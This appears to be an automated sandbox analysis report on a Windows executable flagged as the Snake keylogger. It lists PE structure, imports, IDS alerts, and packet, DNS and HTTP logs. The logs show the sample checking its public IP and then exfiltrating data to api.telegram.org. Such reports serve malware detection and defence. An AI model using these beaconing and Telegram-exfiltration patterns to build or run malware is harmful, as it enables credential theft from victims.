                                                                            mov eax, edi
                                                                            xor eax, esi
                                                                            test eax, 0000000Fh
                                                                            jne 00007FF940C25C50h
                                                                            bt dword ptr [004BE324h], 01h
                                                                            jc 00007FF940C26120h
                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                            jnc 00007FF940C25DEDh
                                                                            test edi, 00000003h
                                                                            jne 00007FF940C25DFEh
                                                                            test esi, 00000003h
                                                                            jne 00007FF940C25DDDh
                                                                            bt edi, 02h
                                                                            jnc 00007FF940C25C4Fh
                                                                            mov eax, dword ptr [esi]
                                                                            sub ecx, 04h
                                                                            lea esi, dword ptr [esi+04h]
                                                                            mov dword ptr [edi], eax
                                                                            lea edi, dword ptr [edi+04h]
                                                                            bt edi, 03h
                                                                            jnc 00007FF940C25C53h
                                                                            movq xmm1, qword ptr [esi]
                                                                            sub ecx, 08h
                                                                            lea esi, dword ptr [esi+08h]
                                                                            movq qword ptr [edi], xmm1
                                                                            lea edi, dword ptr [edi+08h]
                                                                            test esi, 00000007h
                                                                            je 00007FF940C25CA5h
                                                                            bt esi, 03h
                                                                            jnc 00007FF940C25CF8h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [C++] VS2013 build 21005
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                            • [RES] VS2013 build 21005
                                                                            • [LNK] VS2013 UPD4 build 31101

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x418a0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1090000x711c.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xc70000x418a00x41a002a7833176020de2fcf5cabf5d55a8d8aFalse0.8993340773809524data7.828299040259301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1090000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                            RT_RCDATA0xcf7b80x38b68data1.0003486930468024
                                                                            RT_GROUP_ICON0x1083200x76dataEnglishGreat Britain0.6610169491525424
                                                                            RT_GROUP_ICON0x1083980x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x1083ac0x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x1083c00x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x1083d40xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x1084b00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                            Imports

                                                                            DLLImport
                                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-30T10:57:04.598653+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.247.7380TCP
                                                                            2024-12-30T10:57:10.598757+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730132.226.247.7380TCP
                                                                            2024-12-30T10:57:11.223524+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449732149.154.167.220443TCP
                                                                            2024-12-30T10:57:11.526050+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449732149.154.167.220443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 30, 2024 10:57:03.639806986 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:03.647578955 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:03.647655010 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:03.648849964 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:03.654083014 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:04.310375929 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:04.337264061 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:04.342091084 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:04.543490887 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:04.593416929 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:04.593460083 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:04.593532085 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:04.598653078 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:04.603225946 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:04.603240013 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.045761108 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.045876980 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:05.051095009 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:05.051109076 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.051436901 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.098678112 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:05.136605024 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:05.183340073 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.242628098 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.242685080 CET44349731188.114.96.3192.168.2.4
                                                                            Dec 30, 2024 10:57:05.242851019 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:05.247924089 CET49731443192.168.2.4188.114.96.3
                                                                            Dec 30, 2024 10:57:10.344635963 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:10.350325108 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:10.551820993 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:57:10.562915087 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:10.562956095 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:10.563020945 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:10.563466072 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:10.563483000 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:10.598757029 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:57:11.175781012 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.175908089 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:11.179384947 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:11.179394007 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.179650068 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.180999994 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:11.223340034 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.223434925 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:11.223463058 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.526099920 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.526196957 CET44349732149.154.167.220192.168.2.4
                                                                            Dec 30, 2024 10:57:11.526257038 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:57:11.526738882 CET49732443192.168.2.4149.154.167.220
                                                                            Dec 30, 2024 10:58:15.552257061 CET8049730132.226.247.73192.168.2.4
                                                                            Dec 30, 2024 10:58:15.552320004 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:58:45.260049105 CET4973080192.168.2.4132.226.247.73
                                                                            Dec 30, 2024 10:58:45.264925003 CET8049730132.226.247.73192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 30, 2024 10:57:03.627974033 CET5189853192.168.2.41.1.1.1
                                                                            Dec 30, 2024 10:57:03.634711981 CET53518981.1.1.1192.168.2.4
                                                                            Dec 30, 2024 10:57:04.585674047 CET5594653192.168.2.41.1.1.1
                                                                            Dec 30, 2024 10:57:04.592833996 CET53559461.1.1.1192.168.2.4
                                                                            Dec 30, 2024 10:57:10.555624008 CET5464953192.168.2.41.1.1.1
                                                                            Dec 30, 2024 10:57:10.562305927 CET53546491.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 30, 2024 10:57:03.627974033 CET192.168.2.41.1.1.10x78d7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:04.585674047 CET192.168.2.41.1.1.10xf266Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:10.555624008 CET192.168.2.41.1.1.10x9957Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 30, 2024 10:57:03.634711981 CET1.1.1.1192.168.2.40x78d7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:03.634711981 CET1.1.1.1192.168.2.40x78d7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:03.634711981 CET1.1.1.1192.168.2.40x78d7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:03.634711981 CET1.1.1.1192.168.2.40x78d7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:03.634711981 CET1.1.1.1192.168.2.40x78d7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:03.634711981 CET1.1.1.1192.168.2.40x78d7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:04.592833996 CET1.1.1.1192.168.2.40xf266No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:04.592833996 CET1.1.1.1192.168.2.40xf266No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                            Dec 30, 2024 10:57:10.562305927 CET1.1.1.1192.168.2.40x9957No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • reallyfreegeoip.org
                                                                            • api.telegram.org
                                                                            • checkip.dyndns.org

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449730132.226.247.73806344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 30, 2024 10:57:03.648849964 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Dec 30, 2024 10:57:04.310375929 CET273INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Dec 2024 09:57:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Dec 30, 2024 10:57:04.337264061 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Dec 30, 2024 10:57:04.543490887 CET273INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Dec 2024 09:57:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Dec 30, 2024 10:57:10.344635963 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Dec 30, 2024 10:57:10.551820993 CET273INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Dec 2024 09:57:10 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449731188.114.96.34436344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
